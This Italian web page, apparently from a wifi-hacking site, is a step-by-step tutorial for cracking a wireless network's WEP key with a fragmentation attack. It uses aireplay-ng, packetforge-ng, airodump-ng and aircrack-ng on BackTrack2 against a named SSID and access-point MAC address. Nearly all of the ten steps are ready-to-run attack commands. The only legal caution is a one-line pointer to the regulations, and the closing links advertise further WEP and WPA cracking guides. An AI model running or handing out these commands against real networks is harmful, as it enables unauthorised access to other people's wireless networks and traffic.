
Questo tipo di attacco può funzionare se l' Access Point/Router è vulnerabile al tipo di attacco "DefragMentation".
Vedere la NORMATIVA sul Wireless.
Tutto quello che serve è un pc con una scheda wireless , il CD BackTrack2 , il MAC address dell' access point, il SSID (the network “name”) e il MAC address della vostra wireless card.
Dopo aver fatto il boot da BackTrack2, questi sono i passi da seguire:
1]
Abilitiamo il monitor mode della nostra scheda:
airmon-ng start wifi0 11(dove 11 è il canale su cui l'access point comunica)
2]
Esportiamo in variabili i nostri dati:
export ACP=00:14:7F:95:5B:AC < -- Access Point MAC
export WIFI=00:14:51:XX:XX:XX < -- WLAN Card MAC
export SSID=BTHomeHub-1100 < -- SSID of target network
3]
Tiriamo sù l'interfaccia wireless, forziamo nuovamente il monitor mode e ci autentichiamo sull'accesspoint
ifconfig ath0 up
iwconfig ath0 mode Monitor channel 11
aireplay-ng -1 0 -e $SSID -a $ACP -h $WIFI ath0
4]
A questo punto dopo aver ottenuto il messaggio di “Association Successful!” , possiamo avviare l'attacco con aireplay-ng in modalita defragmentation:
aireplay-ng -5 -b $ACP -h $WIFI ath0
5]
A questo punto aspettate finchè non vi viene proposto da aireplay di salvare il pacchetto trovato; vi vhiederà di mantenerlo e voi rispondete "yes";se tutto và bene dopo un pò vi salverà il pacchetto in un file dal nome fragment.xor. Se l'attacco non andrà a buon fine provate con altri pacchetti.
6]
A questo punto potete forgiare il pacchetto salvato in modo da creare un ARP request e di conseguenza usarlo in seguito per creare dati IVS.
Avviate packetforge-ng e salvate il risulato nel file arp-request.
packetforge-ng -0 -a $ACP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w arp-request
7]
A questo punto iniziamo a catturare i dati dall'accesspoint:
airodump-ng -c 11 -bssid $ACP –ivs -w cap ath0
8]
In una nuova console mentre airodump cattura dati, inviamo il pachetto con l'arp request appena creato, all'accesspoint.
aireplay-ng -2 -r arp-request ath0
9]
Quando aireplay catteurerà il nostro pacchetto forgiato, rispondiamo "yes" e magicamente inzierà il broadcasting.
Dovremmo vedere le statistiche di pacchetti catturati da airodump incrementare vertiginosamente.
10]
Dopo aver raggiunto circa 100.000 pacchetti di dati apriamo un altra console e avviamo aircrack:
aircrack-ng -b $ACP *.ivs
Si ringrazia DrPepperONE per aver fornito questa ottima guida
< Prec. | Succ. > |
---|
Articoli simili
I PIU' LETTI
- ERW: il lanciatore per aircrack su Windows
- WEP crack sniffer
- WPA crack facile con SPOONWPA
- Analisi del traffico wireless con wireshark
- Connettersi ad una rete WiFi non protetta
- Antenna esterna sul Notebook
- Antenna bi-quad
- Tutorial Linux BackTrack
- Flash Fonera DD-WRT con estrema facilità
- Parabola USB WiFi